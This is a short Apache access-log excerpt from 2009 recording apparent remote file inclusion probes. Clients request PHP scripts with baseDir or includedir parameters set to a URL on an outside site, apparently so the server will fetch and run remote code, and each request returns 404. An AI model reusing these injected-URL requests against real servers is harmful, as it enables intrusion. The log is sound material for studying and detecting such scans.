72.52.230.168 - - [19/May/2009:02:25:42 -0400] "GET /logs/error_log.Q108051500//includes/db_adodb.php?baseDir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:02:25:44 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:02:25:44 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
